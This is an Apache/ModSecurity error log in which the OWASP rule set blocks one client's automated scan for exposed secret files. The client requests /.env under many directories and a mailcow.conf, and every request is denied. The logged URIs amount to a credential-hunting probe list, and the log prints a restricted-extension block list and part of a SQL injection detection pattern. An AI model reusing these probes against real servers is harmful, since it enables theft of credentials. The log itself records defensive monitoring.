[Mon May 11 20:56:02.724428 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/local/.env"] [unique_id "agImQteaRXe5lR8y0ZOTLQAAAVM"]
[Mon May 11 20:56:02.724624 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/node/.env"] [unique_id "agImQpYn-x0CHsbEbP2t5QAAAIo"]
[Mon May 11 20:56:02.724788 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/node/.env"] [unique_id "agImQpYn-x0CHsbEbP2t5QAAAIo"]
[Mon May 11 20:56:02.724966 2026] [security2:error] [pid 1502013:tid 1502037] [client 195.178.110.199:36048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/node/.env"] [unique_id "agImQpYn-x0CHsbEbP2t5QAAAIo"]
[Mon May 11 20:56:02.731752 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /node/api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/node/api/.env"] [unique_id "agImQteaRXe5lR8y0ZOTLgAAAVU"]
[Mon May 11 20:56:02.731926 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/node/api/.env"] [unique_id "agImQteaRXe5lR8y0ZOTLgAAAVU"]
[Mon May 11 20:56:02.732114 2026] [security2:error] [pid 1534836:tid 1534892] [client 195.178.110.199:36132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/node/api/.env"] [unique_id "agImQteaRXe5lR8y0ZOTLgAAAVU"]
[Mon May 11 20:56:02.740257 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nodeapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/nodeapi/.env"] [unique_id "agImQteaRXe5lR8y0ZOTLwAAAUY"]
[Mon May 11 20:56:02.740410 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/nodeapi/.env"] [unique_id "agImQteaRXe5lR8y0ZOTLwAAAUY"]
[Mon May 11 20:56:02.740576 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/nodeapi/.env"] [unique_id "agImQteaRXe5lR8y0ZOTLwAAAUY"]
[Mon May 11 20:56:02.749623 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nodeweb/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/nodeweb/.env"] [unique_id "agImQteaRXe5lR8y0ZOTMAAAAVM"]
[Mon May 11 20:56:02.749765 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/nodeweb/.env"] [unique_id "agImQteaRXe5lR8y0ZOTMAAAAVM"]
[Mon May 11 20:56:02.749932 2026] [security2:error] [pid 1534836:tid 1534890] [client 195.178.110.199:36124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/nodeweb/.env"] [unique_id "agImQteaRXe5lR8y0ZOTMAAAAVM"]
[Mon May 11 20:56:02.786747 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /market/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/market/.env"] [unique_id "agImQjP5Q_-MBliRCAxnzgAAABY"]
[Mon May 11 20:56:02.786918 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/market/.env"] [unique_id "agImQjP5Q_-MBliRCAxnzgAAABY"]
[Mon May 11 20:56:02.787100 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/market/.env"] [unique_id "agImQjP5Q_-MBliRCAxnzgAAABY"]
[Mon May 11 20:56:02.791313 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /marketing/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/marketing/.env"] [unique_id "agImQiMeXtzav-mi9Syx2gAAAMo"]
[Mon May 11 20:56:02.791493 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/marketing/.env"] [unique_id "agImQiMeXtzav-mi9Syx2gAAAMo"]
[Mon May 11 20:56:02.791681 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/marketing/.env"] [unique_id "agImQiMeXtzav-mi9Syx2gAAAMo"]
[Mon May 11 20:56:02.829802 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /media/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/media/.env"] [unique_id "agImQjP5Q_-MBliRCAxnzwAAABY"]
[Mon May 11 20:56:02.829973 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/media/.env"] [unique_id "agImQjP5Q_-MBliRCAxnzwAAABY"]
[Mon May 11 20:56:02.830171 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/media/.env"] [unique_id "agImQjP5Q_-MBliRCAxnzwAAABY"]
[Mon May 11 20:56:02.831882 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/opt/.env"] [unique_id "agImQjP5Q_-MBliRCAxn0AAAABg"]
[Mon May 11 20:56:02.832055 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/opt/.env"] [unique_id "agImQjP5Q_-MBliRCAxn0AAAABg"]
[Mon May 11 20:56:02.832241 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/opt/.env"] [unique_id "agImQjP5Q_-MBliRCAxn0AAAABg"]
[Mon May 11 20:56:02.847145 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/opt/mailcow-dockerized/mailcow.conf"] [unique_id "agImQvjVc-A-CSptvm1xxAAAAFU"]
[Mon May 11 20:56:02.847417 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/opt/mailcow-dockerized/mailcow.conf"] [unique_id "agImQvjVc-A-CSptvm1xxAAAAFU"]
[Mon May 11 20:56:02.847602 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/opt/mailcow-dockerized/mailcow.conf"] [unique_id "agImQvjVc-A-CSptvm1xxAAAAFU"]
[Mon May 11 20:56:02.978724 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /old/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/old/.env"] [unique_id "agImQjP5Q_-MBliRCAxn1AAAABY"]
[Mon May 11 20:56:02.978921 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/old/.env"] [unique_id "agImQjP5Q_-MBliRCAxn1AAAABY"]
[Mon May 11 20:56:02.979124 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/old/.env"] [unique_id "agImQjP5Q_-MBliRCAxn1AAAABY"]
[Mon May 11 20:56:03.042639 2026] [proxy_fcgi:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:56:03.050679 2026] [proxy_fcgi:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:56:03.060287 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Pattern match "(?i:(?:[\\\\d\\\\W]\\\\s+as\\\\s*?[\\"'`\\\\w]+\\\\s*?from)|(?:^[\\\\W\\\\d]+\\\\s*?(?:union|select|create|rename|truncate|load|alter|delete|update|insert|desc)\\\\b)|(?:(?:select|create|rename|truncate|load|alter|delete|update|insert|desc)\\\\s+(?:(?:group_)concat|char|load ..." at ARGS_NAMES:*update*. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "81"] [id "942360"] [rev "2"] [msg "Detects concatenated basic SQL injection and SQLLFI attempts"] [data "Matched Data: *update found within ARGS_NAMES:*update*: *update*"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "conge.tct-telecom.fr"] [uri "/package-updates/*"] [unique_id "agImQzP5Q_-MBliRCAxn1gAAABg"]
[Mon May 11 20:56:03.060393 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/package-updates/*"] [unique_id "agImQzP5Q_-MBliRCAxn1gAAABg"]
[Mon May 11 20:56:03.060658 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Detects concatenated basic SQL injection and SQLLFI attempts"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/package-updates/*"] [unique_id "agImQzP5Q_-MBliRCAxn1gAAABg"]
[Mon May 11 20:56:03.060894 2026] [proxy_fcgi:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] AH01071: Got error 'Primary script unknown'
[Mon May 11 20:56:03.099513 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/portal/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTNQAAAUY"]
[Mon May 11 20:56:03.099778 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/portal/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTNQAAAUY"]
[Mon May 11 20:56:03.100029 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/portal/.env"] [unique_id "agImQ9eaRXe5lR8y0ZOTNQAAAUY"]
